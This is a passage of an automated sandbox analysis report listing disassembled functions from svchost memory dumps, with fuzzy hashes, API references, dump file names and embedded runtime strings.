            • Opcode Fuzzy Hash: 89ee6a502986ecef42c32a4557c4fa67c18ab72e849ee833ed5afb4ed2bb79ab
            • Instruction Fuzzy Hash: CEF0F931B1C18282FB57ABB9E46867526909F07754F244138D60E466B5FF2DF988C301
            APIs
            • __iob_func.MSVCRT ref: 682950A8
            • __iob_func.MSVCRT ref: 682950B2
            • __iob_func.MSVCRT ref: 682950D2
            • _lock.MSVCRT(?,?,00000000,6828DBF5,?,?,00000000,?,?,6828807D), ref: 682950ED
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: __iob_func$_lock
            • String ID:
            • API String ID: 3447270055-0
            • Opcode ID: 5f8b6aa296dbcfa16adabde4f11a3febc7fb30cbc54f43130410187ef3986e14
            • Instruction ID: c9c70ff51b50ac69e1b0cd2d9051c2d4f6238311e5781820710b4966752ca931
            • Opcode Fuzzy Hash: 5f8b6aa296dbcfa16adabde4f11a3febc7fb30cbc54f43130410187ef3986e14
            • Instruction Fuzzy Hash: 00E068A6B2120FC2EF2C5F33D851328A6D0EB5CB8CFD85034852D0A3C0EB28C6D48740
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn
            • String ID: Could not copy string: buffer too small.
            • API String ID: 3668304517-4053921180
            • Opcode ID: 227f613e0afe62b09c21a363d25952e9be650c9e7fb83f0828f2b369c5476f2c
            • Instruction ID: 2e78dcb4dc9d96c85476afddbd911b2f7c096f972487162d5639ea97ad4d7f33
            • Opcode Fuzzy Hash: 227f613e0afe62b09c21a363d25952e9be650c9e7fb83f0828f2b369c5476f2c
            • Instruction Fuzzy Hash: 6F81E762B1D68555DB13EB21E8443BA7751FF96BC4F909131EA4E477A6EE3CE0858300
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
            • String ID:
            • API String ID: 73155330-3916222277
            • Opcode ID: 1c9c4b0b4cec9e953c22a029d6aa9f8385a0627acb2ec8fa5e74f06502da5603
            • Instruction ID: f3bb20838242a0fb838b71fdb920c6ffb74edc6b87f4e87bea431d828777c3bd
            • Opcode Fuzzy Hash: 1c9c4b0b4cec9e953c22a029d6aa9f8385a0627acb2ec8fa5e74f06502da5603
            • Instruction Fuzzy Hash: E8514B72608B45D6EB179F2AD5942683370FB89B94F548131DB5D43BA2DF39E0A2C704
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: ErrorFileLastWrite
            • String ID: U
            • API String ID: 442123175-4171548499
            • Opcode ID: 6af0ed221b335e21df605535339b147b91ea54c8ece773a99d8de854c7f42a7f
            • Instruction ID: 3f2e5d3649a7840daeb434224adbfdca120238a130c63409bf300b3a3cea7987
            • Opcode Fuzzy Hash: 6af0ed221b335e21df605535339b147b91ea54c8ece773a99d8de854c7f42a7f
            • Instruction Fuzzy Hash: 7141E532A2CA8186E712EF65E8447A9B7E1F799794F408132EE4D877A4EF3CE541C700
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Concurrency::cancel_current_task__std_exception_copy_invalid_parameter_noinfo_noreturn
            • String ID: x338625
            • API String ID: 2371198981-2285776729
            • Opcode ID: 34fc3d2a63870931033fe23853f108ccb039bece76b25947e53ee8fce7437128
            • Instruction ID: 640effaa553348bb0da43a8cd5d8886a3cc2427a50cc3a0940a6d76ea484f514
            • Opcode Fuzzy Hash: 34fc3d2a63870931033fe23853f108ccb039bece76b25947e53ee8fce7437128
            • Instruction Fuzzy Hash: 99319362A09B4181EB17AB25D18436822A0EF55BB4F248B31DA7C467E6FF78E4D38344
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy
            • String ID: Unknown exception
            • API String ID: 1944019136-410509341
            • Opcode ID: 73d500b531547cbb315160b61d253e83e0bea82fe788f8e6fcc6514d2b122ffc
            • Instruction ID: d385053b47f7a659c1570901b568dae8f19aad995b0d1e8944dcba8f62776a46
            • Opcode Fuzzy Hash: 73d500b531547cbb315160b61d253e83e0bea82fe788f8e6fcc6514d2b122ffc
            • Instruction Fuzzy Hash: 16418B62A1C78541EB12AF28E4407AD6361FF557A8F109331EA9C42AE6EF2CD5C1C744
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: NameName::
            • String ID: %lf
            • API String ID: 1333004437-2891890143
            • Opcode ID: 76e751127dea2eba4137a203c5263995195c1acdbc4eb5f43835b70f055ce767
            • Instruction ID: 52604856b9191ab255f706e4ecc596d5b1020e96c6188a2e84a9966256883372
            • Opcode Fuzzy Hash: 76e751127dea2eba4137a203c5263995195c1acdbc4eb5f43835b70f055ce767
            • Instruction Fuzzy Hash: 1331C322A0CB4A85E713EF11A8501B97361FF67788F84C132E94E573B6DE2CF5018704
            APIs
            Strings
            • Cryptographic algorithms are disabled before the power-up self tests are performed., xrefs: 00007FFA4182FB96
            • Cryptographic algorithms are disabled after a power-up self test failed., xrefs: 00007FFA4182FB63
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: __std_exception_copy
            • String ID: Cryptographic algorithms are disabled after a power-up self test failed.$Cryptographic algorithms are disabled before the power-up self tests are performed.
            • API String ID: 592178966-3345525433
            • Opcode ID: b7084373d626514a0fc402de569a2fe3cb91fd5526cf96b979924bd8ccae3c45
            • Instruction ID: f74f68c41ea76a7be0914d0987e0d0d462a779fb83d7598623fed78219068b4b
            • Opcode Fuzzy Hash: b7084373d626514a0fc402de569a2fe3cb91fd5526cf96b979924bd8ccae3c45
            • Instruction Fuzzy Hash: 3E31B022A1CA4691EB13FB20E4912A86370FF96388F90C031D68C436B6FF6CF959C740
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Name::operator+
            • String ID: void$void
            • API String ID: 2943138195-3746155364
            • Opcode ID: 36240e4240a944751f1086ecbeb85afa4ee21ce74374fcba9acde4ae8c411aa0
            • Instruction ID: 87c166537bd4a132a72053182b42dc0165411b3227da437dcb9fc118291dbe5e
            • Opcode Fuzzy Hash: 36240e4240a944751f1086ecbeb85afa4ee21ce74374fcba9acde4ae8c411aa0
            • Instruction Fuzzy Hash: 8B31F866E1CB5698FB03EFA5D8810EC37B0FB4A74CB448536DA4E62BA5DF38A144C750
            APIs
            • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFA4184EF3E), ref: 00007FFA41853FE8
            • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFA4184EF3E), ref: 00007FFA41854029
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: ExceptionFileHeaderRaise
            • String ID: csm
            • API String ID: 2573137834-1018135373
            • Opcode ID: 19efbdd19e74a68b3fc99651f207cc27c692861cb8b3d3a1476ed7770c708f0e
            • Instruction ID: a43402b140cff4f3f9fe8da33f3ac2746a2c9f5bf650fcae189afc07b64d7a39
            • Opcode Fuzzy Hash: 19efbdd19e74a68b3fc99651f207cc27c692861cb8b3d3a1476ed7770c708f0e
            • Instruction Fuzzy Hash: A1114C3261CB4082EB629F15E400259B7E0FB89B98F588235EECD47764EF3CE551C700
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: CriticalSection$EnterLeavefree
            • String ID:
            • API String ID: 4020351045-0
            • Opcode ID: c3d505e1fd8a5c0bca3a6f86233f4d2133910ba55e0007f052694ca8eb1c4992
            • Instruction ID: 427d4420f23fa066b7d62bae12e6d1e39bfa69356ec8b8e395a892f0f019cafb
            • Opcode Fuzzy Hash: c3d505e1fd8a5c0bca3a6f86233f4d2133910ba55e0007f052694ca8eb1c4992
            • Instruction Fuzzy Hash: 4E0152B531660AC6EF48CB5AE8A071633A2B788B49FD09527D51D87360EF7DC4AD8740